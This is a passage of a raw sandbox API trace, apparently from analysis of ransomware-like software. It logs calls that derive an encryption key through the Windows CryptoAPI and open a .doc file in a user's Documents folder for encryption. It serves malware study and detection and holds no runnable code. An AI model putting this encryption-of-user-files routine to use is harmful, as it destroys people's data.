lpMsg=0x6aefc4) returned 0 [0034.200] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.200] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.200] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.200] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.200] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.200] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.201] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.201] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.201] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x4645edc0, ftLastWriteTime.dwHighDateTime=0x1d5bb0b, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 0x7c2100 [0034.201] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.201] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.201] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.201] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.202] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.202] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.202] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.202] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.202] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.202] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.202] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.202] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.202] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.202] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0034.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.202] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0034.203] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.203] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.203] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.203] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.203] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.203] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.203] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.203] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.203] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.203] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.204] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.204] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.204] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.204] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.204] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.204] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.204] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.204] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.204] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.204] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.205] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.205] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.205] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.205] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.205] CryptHashData (hHash=0x7c2240, pbData=0x7c97c8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.205] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.205] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.205] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.205] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.205] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0034.205] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.206] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0034.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.206] CryptDestroyHash (hHash=0x7c2240) returned 1 [0034.206] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.206] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\463pkp6oz8wle1r.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.207] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.207] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.207] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c97c8 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c9b60 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c9c28 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97c8 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9b60 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.208] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq")) returned 0x10 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9c28 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 